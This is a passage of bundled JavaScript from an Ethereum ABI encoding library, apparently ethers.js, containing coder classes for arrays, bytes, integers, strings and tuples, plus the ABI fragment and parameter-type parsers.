    let updateFuncs = [];
    coders.forEach((coder, index)=>{
        let value = arrayValues[index];
        if (coder.dynamic) {
            // Get current dynamic offset (for the future pointer)
            let dynamicOffset = dynamicWriter.length;
            // Encode the dynamic value into the dynamicWriter
            coder.encode(dynamicWriter, value);
            // Prepare to populate the correct offset once we are done
            let updateFunc = staticWriter.writeUpdatableValue();
            updateFuncs.push((baseOffset)=>{
                updateFunc(baseOffset + dynamicOffset);
            });
        } else coder.encode(staticWriter, value);
    });
    // Backfill all the dynamic offsets, now that we know the static length
    updateFuncs.forEach((func)=>{
        func(staticWriter.length);
    });
    let length = writer.appendWriter(staticWriter);
    length += writer.appendWriter(dynamicWriter);
    return length;
}
function $a30effb870f18115$export$417857010dc9287f(reader, coders) {
    let values = [];
    // A reader anchored to this base
    let baseReader = reader.subReader(0);
    coders.forEach((coder)=>{
        let value = null;
        if (coder.dynamic) {
            let offset = reader.readValue();
            let offsetReader = baseReader.subReader(offset.toNumber());
            try {
                value = coder.decode(offsetReader);
            } catch (error) {
                // Cannot recover from this
                if (error.code === (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN) throw error;
                value = error;
                value.baseType = coder.name;
                value.name = coder.localName;
                value.type = coder.type;
            }
        } else try {
            value = coder.decode(reader);
        } catch (error) {
            // Cannot recover from this
            if (error.code === (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN) throw error;
            value = error;
            value.baseType = coder.name;
            value.name = coder.localName;
            value.type = coder.type;
        }
        if (value != undefined) values.push(value);
    });
    // We only output named properties for uniquely named coders
    const uniqueNames = coders.reduce((accum, coder)=>{
        const name = coder.localName;
        if (name) {
            if (!accum[name]) accum[name] = 0;
            accum[name]++;
        }
        return accum;
    }, {});
    // Add any named parameters (i.e. tuples)
    coders.forEach((coder, index)=>{
        let name = coder.localName;
        if (!name || uniqueNames[name] !== 1) return;
        if (name === "length") name = "_length";
        if (values[name] != null) return;
        const value = values[index];
        if (value instanceof Error) Object.defineProperty(values, name, {
            enumerable: true,
            get: ()=>{
                throw value;
            }
        });
        else values[name] = value;
    });
    for(let i = 0; i < values.length; i++){
        const value = values[i];
        if (value instanceof Error) Object.defineProperty(values, i, {
            enumerable: true,
            get: ()=>{
                throw value;
            }
        });
    }
    return Object.freeze(values);
}
class $a30effb870f18115$export$88bc419d2df11f54 extends (0, $2c0f0ed4c5bed241$export$2c0c39526f8bad46) {
    constructor(coder, length, localName){
        const type = coder.type + "[" + (length >= 0 ? length : "") + "]";
        const dynamic = length === -1 || coder.dynamic;
        super("array", type, localName, dynamic);
        this.coder = coder;
        this.length = length;
    }
    defaultValue() {
        // Verifies the child coder is valid (even if the array is dynamic or 0-length)
        const defaultChild = this.coder.defaultValue();
        const result = [];
        for(let i = 0; i < this.length; i++)result.push(defaultChild);
        return result;
    }
    encode(writer, value) {
        if (!Array.isArray(value)) this._throwError("expected array value", value);
        let count = this.length;
        if (count === -1) {
            count = value.length;
            writer.writeValue(value.length);
        }
        $a30effb870f18115$var$logger.checkArgumentCount(value.length, count, "coder array" + (this.localName ? " " + this.localName : ""));
        let coders = [];
        for(let i = 0; i < value.length; i++)coders.push(this.coder);
        return $a30effb870f18115$export$2a703dbb0cb35339(writer, coders, value);
    }
    decode(reader) {
        let count = this.length;
        if (count === -1) {
            count = reader.readValue().toNumber();
            // Check that there is *roughly* enough data to ensure
            // stray random data is not being read as a length. Each
            // slot requires at least 32 bytes for their value (or 32
            // bytes as a link to the data). This could use a much
            // tighter bound, but we are erroring on the side of safety.
            if (count * 32 > reader._data.length) $a30effb870f18115$var$logger.throwError("insufficient data length", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.BUFFER_OVERRUN, {
                length: reader._data.length,
                count: count
            });
        }
        let coders = [];
        for(let i = 0; i < count; i++)coders.push(new (0, $3a25498c1332da4a$export$87c41d1139a03fa2)(this.coder));
        return reader.coerce(this.name, $a30effb870f18115$export$417857010dc9287f(reader, coders));
    }
}



"use strict";
class $394fcd7db865fb3c$export$fe9118d6c093150c extends (0, $2c0f0ed4c5bed241$export$2c0c39526f8bad46) {
    constructor(localName){
        super("bool", "bool", localName, false);
    }
    defaultValue() {
        return false;
    }
    encode(writer, value) {
        return writer.writeValue(value ? 1 : 0);
    }
    decode(reader) {
        return reader.coerce(this.type, !reader.readValue().isZero());
    }
}




"use strict";
class $6e254db4e73082b7$export$db9eadd8df12ad2e extends (0, $2c0f0ed4c5bed241$export$2c0c39526f8bad46) {
    constructor(type, localName){
        super(type, type, localName, true);
    }
    defaultValue() {
        return "0x";
    }
    encode(writer, value) {
        value = (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(value);
        let length = writer.writeValue(value.length);
        length += writer.writeBytes(value);
        return length;
    }
    decode(reader) {
        return reader.readBytes(reader.readValue().toNumber(), true);
    }
}
class $6e254db4e73082b7$export$e5823e9574df18d2 extends $6e254db4e73082b7$export$db9eadd8df12ad2e {
    constructor(localName){
        super("bytes", localName);
    }
    decode(reader) {
        return reader.coerce(this.name, (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(super.decode(reader)));
    }
}




"use strict";
class $9c7ee045e883fffe$export$7dec9db68e6bcf5a extends (0, $2c0f0ed4c5bed241$export$2c0c39526f8bad46) {
    constructor(size, localName){
        let name = "bytes" + String(size);
        super(name, name, localName, false);
        this.size = size;
    }
    defaultValue() {
        return "0x0000000000000000000000000000000000000000000000000000000000000000".substring(0, 2 + this.size * 2);
    }
    encode(writer, value) {
        let data = (0, $7b88b6e03e4708f2$export$3131421a7d01b4fb)(value);
        if (data.length !== this.size) this._throwError("incorrect data length", value);
        return writer.writeBytes(data);
    }
    decode(reader) {
        return reader.coerce(this.name, (0, $7b88b6e03e4708f2$export$2b0d6b5fbe698c70)(reader.readBytes(this.size)));
    }
}



"use strict";
class $8815781d2f2dcc92$export$70982cadf2d6b4ec extends (0, $2c0f0ed4c5bed241$export$2c0c39526f8bad46) {
    constructor(localName){
        super("null", "", localName, false);
    }
    defaultValue() {
        return null;
    }
    encode(writer, value) {
        if (value != null) this._throwError("not null", value);
        return writer.writeBytes([]);
    }
    decode(reader) {
        reader.readBytes(0);
        return reader.coerce(this.name, null);
    }
}




const $c5333cf79421e056$export$c83ef0909a6ddeec = /*#__PURE__*/ (0, $0df4577496dcf693$export$d97aa349ed20696).from(-1);
const $c5333cf79421e056$export$aaef8a3eae948f03 = /*#__PURE__*/ (0, $0df4577496dcf693$export$d97aa349ed20696).from(0);
const $c5333cf79421e056$export$9aa05a5866350bcf = /*#__PURE__*/ (0, $0df4577496dcf693$export$d97aa349ed20696).from(1);
const $c5333cf79421e056$export$9276dd97bf62cc8d = /*#__PURE__*/ (0, $0df4577496dcf693$export$d97aa349ed20696).from(2);
const $c5333cf79421e056$export$c8db55bd7405209e = /*#__PURE__*/ (0, $0df4577496dcf693$export$d97aa349ed20696).from("1000000000000000000");
const $c5333cf79421e056$export$1b53890de5aabdd0 = /*#__PURE__*/ (0, $0df4577496dcf693$export$d97aa349ed20696).from("0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff");
const $c5333cf79421e056$export$963c9b9317b80aaf = /*#__PURE__*/ (0, $0df4577496dcf693$export$d97aa349ed20696).from("-0x8000000000000000000000000000000000000000000000000000000000000000");
const $c5333cf79421e056$export$6f8dbb07ebe6d738 = /*#__PURE__*/ (0, $0df4577496dcf693$export$d97aa349ed20696).from("0x7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff");



"use strict";
class $f9cce4408e3f228e$export$b934dc8cfe13938c extends (0, $2c0f0ed4c5bed241$export$2c0c39526f8bad46) {
    constructor(size, signed, localName){
        const name = (signed ? "int" : "uint") + size * 8;
        super(name, name, localName, false);
        this.size = size;
        this.signed = signed;
    }
    defaultValue() {
        return 0;
    }
    encode(writer, value) {
        let v = (0, $0df4577496dcf693$export$d97aa349ed20696).from(value);
        // Check bounds are safe for encoding
        let maxUintValue = (0, $c5333cf79421e056$export$1b53890de5aabdd0).mask(writer.wordSize * 8);
        if (this.signed) {
            let bounds = maxUintValue.mask(this.size * 8 - 1);
            if (v.gt(bounds) || v.lt(bounds.add((0, $c5333cf79421e056$export$9aa05a5866350bcf)).mul((0, $c5333cf79421e056$export$c83ef0909a6ddeec)))) this._throwError("value out-of-bounds", value);
        } else if (v.lt((0, $c5333cf79421e056$export$aaef8a3eae948f03)) || v.gt(maxUintValue.mask(this.size * 8))) this._throwError("value out-of-bounds", value);
        v = v.toTwos(this.size * 8).mask(this.size * 8);
        if (this.signed) v = v.fromTwos(this.size * 8).toTwos(8 * writer.wordSize);
        return writer.writeValue(v);
    }
    decode(reader) {
        let value = reader.readValue().mask(this.size * 8);
        if (this.signed) value = value.fromTwos(this.size * 8);
        return reader.coerce(this.name, value);
    }
}




"use strict";
class $90994e88a8e0b05b$export$2d1b854518731426 extends (0, $6e254db4e73082b7$export$db9eadd8df12ad2e) {
    constructor(localName){
        super("string", localName);
    }
    defaultValue() {
        return "";
    }
    encode(writer, value) {
        return super.encode(writer, (0, $b2a54ce293d87a2e$export$8feeb310b4b4752f)(value));
    }
    decode(reader) {
        return (0, $b2a54ce293d87a2e$export$7643a1dc2c38d5eb)(super.decode(reader));
    }
}




"use strict";
class $c633d82d9fdfc710$export$e9fceba8f110fea6 extends (0, $2c0f0ed4c5bed241$export$2c0c39526f8bad46) {
    constructor(coders, localName){
        let dynamic = false;
        const types = [];
        coders.forEach((coder)=>{
            if (coder.dynamic) dynamic = true;
            types.push(coder.type);
        });
        const type = "tuple(" + types.join(",") + ")";
        super("tuple", type, localName, dynamic);
        this.coders = coders;
    }
    defaultValue() {
        const values = [];
        this.coders.forEach((coder)=>{
            values.push(coder.defaultValue());
        });
        // We only output named properties for uniquely named coders
        const uniqueNames = this.coders.reduce((accum, coder)=>{
            const name = coder.localName;
            if (name) {
                if (!accum[name]) accum[name] = 0;
                accum[name]++;
            }
            return accum;
        }, {});
        // Add named values
        this.coders.forEach((coder, index)=>{
            let name = coder.localName;
            if (!name || uniqueNames[name] !== 1) return;
            if (name === "length") name = "_length";
            if (values[name] != null) return;
            values[name] = values[index];
        });
        return Object.freeze(values);
    }
    encode(writer, value) {
        return (0, $a30effb870f18115$export$2a703dbb0cb35339)(writer, this.coders, value);
    }
    decode(reader) {
        return reader.coerce(this.name, (0, $a30effb870f18115$export$417857010dc9287f)(reader, this.coders));
    }
}






"use strict";
const $871a765ee5e657d2$var$logger = new (0, $97a8d5981d597bb7$export$efa9a398d6368992)((0, $7b99b6039539a6c4$export$83d89fbfd8236492));
const $871a765ee5e657d2$var$_constructorGuard = {};
let $871a765ee5e657d2$var$ModifiersBytes = {
    calldata: true,
    memory: true,
    storage: true
};
let $871a765ee5e657d2$var$ModifiersNest = {
    calldata: true,
    memory: true
};
function $871a765ee5e657d2$var$checkModifier(type, name) {
    if (type === "bytes" || type === "string") {
        if ($871a765ee5e657d2$var$ModifiersBytes[name]) return true;
    } else if (type === "address") {
        if (name === "payable") return true;
    } else if (type.indexOf("[") >= 0 || type === "tuple") {
        if ($871a765ee5e657d2$var$ModifiersNest[name]) return true;
    }
    if ($871a765ee5e657d2$var$ModifiersBytes[name] || name === "payable") $871a765ee5e657d2$var$logger.throwArgumentError("invalid modifier", "name", name);
    return false;
}
// @TODO: Make sure that children of an indexed tuple are marked with a null indexed
function $871a765ee5e657d2$var$parseParamType(param, allowIndexed) {
    let originalParam = param;
    function throwError(i) {
        $871a765ee5e657d2$var$logger.throwArgumentError(`unexpected character at position ${i}`, "param", param);
    }
    param = param.replace(/\s/g, " ");
    function newNode(parent) {
        let node = {
            type: "",
            name: "",
            parent: parent,
            state: {
                allowType: true
            }
        };
        if (allowIndexed) node.indexed = false;
        return node;
    }
    let parent = {
        type: "",
        name: "",
        state: {
            allowType: true
        }
    };
    let node = parent;
    for(let i = 0; i < param.length; i++){
        let c = param[i];
        switch(c){
            case "(":
                if (node.state.allowType && node.type === "") node.type = "tuple";
                else if (!node.state.allowParams) throwError(i);
                node.state.allowType = false;
                node.type = $871a765ee5e657d2$var$verifyType(node.type);
                node.components = [
                    newNode(node)
                ];
                node = node.components[0];
                break;
            case ")":
                delete node.state;
                if (node.name === "indexed") {
                    if (!allowIndexed) throwError(i);
                    node.indexed = true;
                    node.name = "";
                }
                if ($871a765ee5e657d2$var$checkModifier(node.type, node.name)) node.name = "";
                node.type = $871a765ee5e657d2$var$verifyType(node.type);
                let child = node;
                node = node.parent;
                if (!node) throwError(i);
                delete child.parent;
                node.state.allowParams = false;
                node.state.allowName = true;
                node.state.allowArray = true;
                break;
            case ",":
                delete node.state;
                if (node.name === "indexed") {
                    if (!allowIndexed) throwError(i);
                    node.indexed = true;
                    node.name = "";
                }
                if ($871a765ee5e657d2$var$checkModifier(node.type, node.name)) node.name = "";
                node.type = $871a765ee5e657d2$var$verifyType(node.type);
                let sibling = newNode(node.parent);
                //{ type: "", name: "", parent: node.parent, state: { allowType: true } };
                node.parent.components.push(sibling);
                delete node.parent;
                node = sibling;
                break;
            // Hit a space...
            case " ":
                // If reading type, the type is done and may read a param or name
                if (node.state.allowType) {
                    if (node.type !== "") {
                        node.type = $871a765ee5e657d2$var$verifyType(node.type);
                        delete node.state.allowType;
                        node.state.allowName = true;
                        node.state.allowParams = true;
                    }
                }
                // If reading name, the name is done
                if (node.state.allowName) {
                    if (node.name !== "") {
                        if (node.name === "indexed") {
                            if (!allowIndexed) throwError(i);
                            if (node.indexed) throwError(i);
                            node.indexed = true;
                            node.name = "";
                        } else if ($871a765ee5e657d2$var$checkModifier(node.type, node.name)) node.name = "";
                        else node.state.allowName = false;
                    }
                }
                break;
            case "[":
                if (!node.state.allowArray) throwError(i);
                node.type += c;
                node.state.allowArray = false;
                node.state.allowName = false;
                node.state.readArray = true;
                break;
            case "]":
                if (!node.state.readArray) throwError(i);
                node.type += c;
                node.state.readArray = false;
                node.state.allowArray = true;
                node.state.allowName = true;
                break;
            default:
                if (node.state.allowType) {
                    node.type += c;
                    node.state.allowParams = true;
                    node.state.allowArray = true;
                } else if (node.state.allowName) {
                    node.name += c;
                    delete node.state.allowArray;
                } else if (node.state.readArray) node.type += c;
                else throwError(i);
        }
    }
    if (node.parent) $871a765ee5e657d2$var$logger.throwArgumentError("unexpected eof", "param", param);
    delete parent.state;
    if (node.name === "indexed") {
        if (!allowIndexed) throwError(originalParam.length - 7);
        if (node.indexed) throwError(originalParam.length - 7);
        node.indexed = true;
        node.name = "";
    } else if ($871a765ee5e657d2$var$checkModifier(node.type, node.name)) node.name = "";
    parent.type = $871a765ee5e657d2$var$verifyType(parent.type);
    return parent;
}
function $871a765ee5e657d2$var$populate(object, params) {
    for(let key in params)(0, $a463a6b5f08d6875$exports.defineReadOnly)(object, key, params[key]);
}
const $871a765ee5e657d2$export$f010f239efc4d445 = Object.freeze({
    // Bare formatting, as is needed for computing a sighash of an event or function
    sighash: "sighash",
    // Human-Readable with Minimal spacing and without names (compact human-readable)
    minimal: "minimal",
    // Human-Readable with nice spacing, including all names
    full: "full",
    // JSON-format a la Solidity
    json: "json"
});
const $871a765ee5e657d2$var$paramTypeArray = new RegExp(/^(.*)\[([0-9]*)\]$/);
class $871a765ee5e657d2$export$426dc07f493a4c47 {
    constructor(constructorGuard, params){
        if (constructorGuard !== $871a765ee5e657d2$var$_constructorGuard) $871a765ee5e657d2$var$logger.throwError("use fromString", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.UNSUPPORTED_OPERATION, {
            operation: "new ParamType()"
        });
        $871a765ee5e657d2$var$populate(this, params);
        let match = this.type.match($871a765ee5e657d2$var$paramTypeArray);
        if (match) $871a765ee5e657d2$var$populate(this, {
            arrayLength: parseInt(match[2] || "-1"),
            arrayChildren: $871a765ee5e657d2$export$426dc07f493a4c47.fromObject({
                type: match[1],
                components: this.components
            }),
            baseType: "array"
        });
        else $871a765ee5e657d2$var$populate(this, {
            arrayLength: null,
            arrayChildren: null,
            baseType: this.components != null ? "tuple" : this.type
        });
        this._isParamType = true;
        Object.freeze(this);
    }
    // Format the parameter fragment
    //   - sighash: "(uint256,address)"
    //   - minimal: "tuple(uint256,address) indexed"
    //   - full:    "tuple(uint256 foo, address bar) indexed baz"
    format(format) {
        if (!format) format = $871a765ee5e657d2$export$f010f239efc4d445.sighash;
        if (!$871a765ee5e657d2$export$f010f239efc4d445[format]) $871a765ee5e657d2$var$logger.throwArgumentError("invalid format type", "format", format);
        if (format === $871a765ee5e657d2$export$f010f239efc4d445.json) {
            let result = {
                type: this.baseType === "tuple" ? "tuple" : this.type,
                name: this.name || undefined
            };
            if (typeof this.indexed === "boolean") result.indexed = this.indexed;
            if (this.components) result.components = this.components.map((comp)=>JSON.parse(comp.format(format)));
            return JSON.stringify(result);
        }
        let result = "";
        // Array
        if (this.baseType === "array") {
            result += this.arrayChildren.format(format);
            result += "[" + (this.arrayLength < 0 ? "" : String(this.arrayLength)) + "]";
        } else if (this.baseType === "tuple") {
            if (format !== $871a765ee5e657d2$export$f010f239efc4d445.sighash) result += this.type;
            result += "(" + this.components.map((comp)=>comp.format(format)).join(format === $871a765ee5e657d2$export$f010f239efc4d445.full ? ", " : ",") + ")";
        } else result += this.type;
        if (format !== $871a765ee5e657d2$export$f010f239efc4d445.sighash) {
            if (this.indexed === true) result += " indexed";
            if (format === $871a765ee5e657d2$export$f010f239efc4d445.full && this.name) result += " " + this.name;
        }
        return result;
    }
    static from(value, allowIndexed) {
        if (typeof value === "string") return $871a765ee5e657d2$export$426dc07f493a4c47.fromString(value, allowIndexed);
        return $871a765ee5e657d2$export$426dc07f493a4c47.fromObject(value);
    }
    static fromObject(value) {
        if ($871a765ee5e657d2$export$426dc07f493a4c47.isParamType(value)) return value;
        return new $871a765ee5e657d2$export$426dc07f493a4c47($871a765ee5e657d2$var$_constructorGuard, {
            name: value.name || null,
            type: $871a765ee5e657d2$var$verifyType(value.type),
            indexed: value.indexed == null ? null : !!value.indexed,
            components: value.components ? value.components.map($871a765ee5e657d2$export$426dc07f493a4c47.fromObject) : null
        });
    }
    static fromString(value, allowIndexed) {
        function ParamTypify(node) {
            return $871a765ee5e657d2$export$426dc07f493a4c47.fromObject({
                name: node.name,
                type: node.type,
                indexed: node.indexed,
                components: node.components
            });
        }
        return ParamTypify($871a765ee5e657d2$var$parseParamType(value, !!allowIndexed));
    }
    static isParamType(value) {
        return !!(value != null && value._isParamType);
    }
}
function $871a765ee5e657d2$var$parseParams(value, allowIndex) {
    return $871a765ee5e657d2$var$splitNesting(value).map((param)=>$871a765ee5e657d2$export$426dc07f493a4c47.fromString(param, allowIndex));
}
class $871a765ee5e657d2$export$ffb0004e005737fa {
    constructor(constructorGuard, params){
        if (constructorGuard !== $871a765ee5e657d2$var$_constructorGuard) $871a765ee5e657d2$var$logger.throwError("use a static from method", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.UNSUPPORTED_OPERATION, {
            operation: "new Fragment()"
        });
        $871a765ee5e657d2$var$populate(this, params);
        this._isFragment = true;
        Object.freeze(this);
    }
    static from(value) {
        if ($871a765ee5e657d2$export$ffb0004e005737fa.isFragment(value)) return value;
        if (typeof value === "string") return $871a765ee5e657d2$export$ffb0004e005737fa.fromString(value);
        return $871a765ee5e657d2$export$ffb0004e005737fa.fromObject(value);
    }
    static fromObject(value) {
        if ($871a765ee5e657d2$export$ffb0004e005737fa.isFragment(value)) return value;
        switch(value.type){
            case "function":
                return $871a765ee5e657d2$export$8d576c928b93668f.fromObject(value);
            case "event":
                return $871a765ee5e657d2$export$958548f08bac2833.fromObject(value);
            case "constructor":
                return $871a765ee5e657d2$export$3ac5c9504f801ea4.fromObject(value);
            case "error":
                return $871a765ee5e657d2$export$2c42c6d543aa9b59.fromObject(value);
            case "fallback":
            case "receive":
                // @TODO: Something? Maybe return a FunctionFragment? A custom DefaultFunctionFragment?
                return null;
        }
        return $871a765ee5e657d2$var$logger.throwArgumentError("invalid fragment object", "value", value);
    }
    static fromString(value) {
        // Make sure the "returns" is surrounded by a space and all whitespace is exactly one space
        value = value.replace(/\s/g, " ");
        value = value.replace(/\(/g, " (").replace(/\)/g, ") ").replace(/\s+/g, " ");
        value = value.trim();
        if (value.split(" ")[0] === "event") return $871a765ee5e657d2$export$958548f08bac2833.fromString(value.substring(5).trim());
        else if (value.split(" ")[0] === "function") return $871a765ee5e657d2$export$8d576c928b93668f.fromString(value.substring(8).trim());
        else if (value.split("(")[0].trim() === "constructor") return $871a765ee5e657d2$export$3ac5c9504f801ea4.fromString(value.trim());
        else if (value.split(" ")[0] === "error") return $871a765ee5e657d2$export$2c42c6d543aa9b59.fromString(value.substring(5).trim());
        return $871a765ee5e657d2$var$logger.throwArgumentError("unsupported fragment", "value", value);
    }
    static isFragment(value) {
        return !!(value && value._isFragment);
    }
}
class $871a765ee5e657d2$export$958548f08bac2833 extends $871a765ee5e657d2$export$ffb0004e005737fa {
    format(format) {
        if (!format) format = $871a765ee5e657d2$export$f010f239efc4d445.sighash;
        if (!$871a765ee5e657d2$export$f010f239efc4d445[format]) $871a765ee5e657d2$var$logger.throwArgumentError("invalid format type", "format", format);
        if (format === $871a765ee5e657d2$export$f010f239efc4d445.json) return JSON.stringify({
            type: "event",
            anonymous: this.anonymous,
            name: this.name,
            inputs: this.inputs.map((input)=>JSON.parse(input.format(format)))
        });
        let result = "";
        if (format !== $871a765ee5e657d2$export$f010f239efc4d445.sighash) result += "event ";
        result += this.name + "(" + this.inputs.map((input)=>input.format(format)).join(format === $871a765ee5e657d2$export$f010f239efc4d445.full ? ", " : ",") + ") ";
        if (format !== $871a765ee5e657d2$export$f010f239efc4d445.sighash) {
            if (this.anonymous) result += "anonymous ";
        }
        return result.trim();
    }
    static from(value) {
        if (typeof value === "string") return $871a765ee5e657d2$export$958548f08bac2833.fromString(value);
        return $871a765ee5e657d2$export$958548f08bac2833.fromObject(value);
    }
    static fromObject(value) {
        if ($871a765ee5e657d2$export$958548f08bac2833.isEventFragment(value)) return value;
        if (value.type !== "event") $871a765ee5e657d2$var$logger.throwArgumentError("invalid event object", "value", value);
        const params = {
            name: $871a765ee5e657d2$var$verifyIdentifier(value.name),
            anonymous: value.anonymous,
            inputs: value.inputs ? value.inputs.map($871a765ee5e657d2$export$426dc07f493a4c47.fromObject) : [],
            type: "event"
        };
        return new $871a765ee5e657d2$export$958548f08bac2833($871a765ee5e657d2$var$_constructorGuard, params);
    }
    static fromString(value) {
        let match = value.match($871a765ee5e657d2$var$regexParen);
        if (!match) $871a765ee5e657d2$var$logger.throwArgumentError("invalid event string", "value", value);
        let anonymous = false;
        match[3].split(" ").forEach((modifier)=>{
            switch(modifier.trim()){
                case "anonymous":
                    anonymous = true;
                    break;
                case "":
                    break;
                default:
                    $871a765ee5e657d2$var$logger.warn("unknown modifier: " + modifier);
            }
        });
        return $871a765ee5e657d2$export$958548f08bac2833.fromObject({
            name: match[1].trim(),
            anonymous: anonymous,
            inputs: $871a765ee5e657d2$var$parseParams(match[2], true),
            type: "event"
        });
    }
    static isEventFragment(value) {
        return value && value._isFragment && value.type === "event";
    }
}
function $871a765ee5e657d2$var$parseGas(value, params) {
    params.gas = null;
    let comps = value.split("@");
    if (comps.length !== 1) {
        if (comps.length > 2) $871a765ee5e657d2$var$logger.throwArgumentError("invalid human-readable ABI signature", "value", value);
        if (!comps[1].match(/^[0-9]+$/)) $871a765ee5e657d2$var$logger.throwArgumentError("invalid human-readable ABI signature gas", "value", value);
        params.gas = (0, $0df4577496dcf693$export$d97aa349ed20696).from(comps[1]);
        return comps[0];
    }
    return value;
}
function $871a765ee5e657d2$var$parseModifiers(value, params) {
    params.constant = false;
    params.payable = false;
    params.stateMutability = "nonpayable";
    value.split(" ").forEach((modifier)=>{
        switch(modifier.trim()){
            case "constant":
                params.constant = true;
                break;
            case "payable":
                params.payable = true;
                params.stateMutability = "payable";
                break;
            case "nonpayable":
                params.payable = false;
                params.stateMutability = "nonpayable";
                break;
            case "pure":
                params.constant = true;
                params.stateMutability = "pure";
                break;
            case "view":
                params.constant = true;
                params.stateMutability = "view";
                break;
            case "external":
            case "public":
            case "":
                break;
            default:
                console.log("unknown modifier: " + modifier);
        }
    });
}
function $871a765ee5e657d2$var$verifyState(value) {
    let result = {
        constant: false,
        payable: true,
        stateMutability: "payable"
    };
    if (value.stateMutability != null) {
        result.stateMutability = value.stateMutability;
        // Set (and check things are consistent) the constant property
        result.constant = result.stateMutability === "view" || result.stateMutability === "pure";
        if (value.constant != null) {
            if (!!value.constant !== result.constant) $871a765ee5e657d2$var$logger.throwArgumentError("cannot have constant function with mutability " + result.stateMutability, "value", value);
        }
        // Set (and check things are consistent) the payable property
        result.payable = result.stateMutability === "payable";
        if (value.payable != null) {
            if (!!value.payable !== result.payable) $871a765ee5e657d2$var$logger.throwArgumentError("cannot have payable function with mutability " + result.stateMutability, "value", value);
        }
    } else if (value.payable != null) {
        result.payable = !!value.payable;
        // If payable we can assume non-constant; otherwise we can't assume
        if (value.constant == null && !result.payable && value.type !== "constructor") $871a765ee5e657d2$var$logger.throwArgumentError("unable to determine stateMutability", "value", value);
        result.constant = !!value.constant;
        if (result.constant) result.stateMutability = "view";
        else result.stateMutability = result.payable ? "payable" : "nonpayable";
        if (result.payable && result.constant) $871a765ee5e657d2$var$logger.throwArgumentError("cannot have constant payable function", "value", value);
    } else if (value.constant != null) {
        result.constant = !!value.constant;
        result.payable = !result.constant;
        result.stateMutability = result.constant ? "view" : "payable";
    } else if (value.type !== "constructor") $871a765ee5e657d2$var$logger.throwArgumentError("unable to determine stateMutability", "value", value);
    return result;
}
class $871a765ee5e657d2$export$3ac5c9504f801ea4 extends $871a765ee5e657d2$export$ffb0004e005737fa {
    format(format) {
        if (!format) format = $871a765ee5e657d2$export$f010f239efc4d445.sighash;
        if (!$871a765ee5e657d2$export$f010f239efc4d445[format]) $871a765ee5e657d2$var$logger.throwArgumentError("invalid format type", "format", format);
        if (format === $871a765ee5e657d2$export$f010f239efc4d445.json) return JSON.stringify({
            type: "constructor",
            stateMutability: this.stateMutability !== "nonpayable" ? this.stateMutability : undefined,
            payable: this.payable,
            gas: this.gas ? this.gas.toNumber() : undefined,
            inputs: this.inputs.map((input)=>JSON.parse(input.format(format)))
        });
        if (format === $871a765ee5e657d2$export$f010f239efc4d445.sighash) $871a765ee5e657d2$var$logger.throwError("cannot format a constructor for sighash", (0, $97a8d5981d597bb7$export$efa9a398d6368992).errors.UNSUPPORTED_OPERATION, {
            operation: "format(sighash)"
        });
        let result = "constructor(" + this.inputs.map((input)=>input.format(format)).join(format === $871a765ee5e657d2$export$f010f239efc4d445.full ? ", " : ",") + ") ";
        if (this.stateMutability && this.stateMutability !== "nonpayable") result += this.stateMutability + " ";
        return result.trim();
    }
    static from(value) {
        if (typeof value === "string") return $871a765ee5e657d2$export$3ac5c9504f801ea4.fromString(value);
        return $871a765ee5e657d2$export$3ac5c9504f801ea4.fromObject(value);
    }
    static fromObject(value) {
        if ($871a765ee5e657d2$export$3ac5c9504f801ea4.isConstructorFragment(value)) return value;
        if (value.type !== "constructor") $871a765ee5e657d2$var$logger.throwArgumentError("invalid constructor object", "value", value);
        let state = $871a765ee5e657d2$var$verifyState(value);
        if (state.constant) $871a765ee5e657d2$var$logger.throwArgumentError("constructor cannot be constant", "value", value);
        const params = {
            name: null,
            type: value.type,
            inputs: value.inputs ? value.inputs.map($871a765ee5e657d2$export$426dc07f493a4c47.fromObject) : [],
            payable: state.payable,
            stateMutability: state.stateMutability,
            gas: value.gas ? (0, $0df4577496dcf693$export$d97aa349ed20696).from(value.gas) : null
        };
        return new $871a765ee5e657d2$export$3ac5c9504f801ea4($871a765ee5e657d2$var$_constructorGuard, params);
    }
    static fromString(value) {
        let params = {
            type: "constructor"
        };
        value = $871a765ee5e657d2$var$parseGas(value, params);
        let parens = value.match($871a765ee5e657d2$var$regexParen);
        if (!parens || parens[1].trim() !== "constructor") $871a765ee5e657d2$var$logger.throwArgumentError("invalid constructor string", "value", value);
        params.inputs = $871a765ee5e657d2$var$parseParams(parens[2].trim(), false);
        $871a765ee5e657d2$var$parseModifiers(parens[3].trim(), params);
        return $871a765ee5e657d2$export$3ac5c9504f801ea4.fromObject(params);
    }
    static isConstructorFragment(value) {
        return value && value._isFragment && value.type === "constructor";
    }
}
class $871a765ee5e657d2$export$8d576c928b93668f extends $871a765ee5e657d2$export$3ac5c9504f801ea4 {
    format(format) {
        if (!format) format = $871a765ee5e657d2$export$f010f239efc4d445.sighash;
        if (!$871a765ee5e657d2$export$f010f239efc4d445[format]) $871a765ee5e657d2$var$logger.throwArgumentError("invalid format type", "format", format);
        if (format === $871a765ee5e657d2$export$f010f239efc4d445.json) return JSON.stringify({
            type: "function",
            name: this.name,
            constant: this.constant,
            stateMutability: this.stateMutability !== "nonpayable" ? this.stateMutability : undefined,
            payable: this.payable,
            gas: this.gas ? this.gas.toNumber() : undefined,
            inputs: this.inputs.map((input)=>JSON.parse(input.format(format))),
            outputs: this.outputs.map((output)=>JSON.parse(output.format(format)))
        });
        let result = "";
        if (format !== $871a765ee5e657d2$export$f010f239efc4d445.sighash) result += "function ";
        result += this.name + "(" + this.inputs.map((input)=>input.format(format)).join(format === $871a765ee5e657d2$export$f010f239efc4d445.full ? ", " : ",") + ") ";
        if (format !== $871a765ee5e657d2$export$f010f239efc4d445.sighash) {
            if (this.stateMutability) {
                if (this.stateMutability !== "nonpayable") result += this.stateMutability + " ";
            } else if (this.constant) result += "view ";
            if (this.outputs && this.outputs.length) result += "returns (" + this.outputs.map((output)=>output.format(format)).join(", ") + ") ";
            if (this.gas != null) result += "@" + this.gas.toString() + " ";
        }
        return result.trim();
    }
    static from(value) {
